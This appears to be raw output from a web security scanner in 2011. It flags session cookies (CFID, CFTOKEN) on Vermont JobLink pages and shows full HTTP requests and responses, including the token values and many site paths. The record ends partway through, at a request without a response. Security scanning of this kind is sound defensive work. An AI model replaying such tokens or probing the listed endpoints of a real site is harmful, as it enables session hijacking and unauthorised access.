HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:14:18 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ location: /ada Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- URL validated --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_offices_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:58 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_protectyourself_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:20 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_quicksearch_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:54 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_registration_dsp.cfm?reg%5Ftype=em HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache location: mn_empagreement_dsp.cfm Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off --> <!-- Caching is Off -->
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_settings_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:54 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_ssncheck.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_veterans_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:54 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_warn_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:11:49 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ location: /ada/mn_warninfo_dsp.cfm Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- URL validated --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/services/schools/schsearch.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/FAQ.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:55 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/Login.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
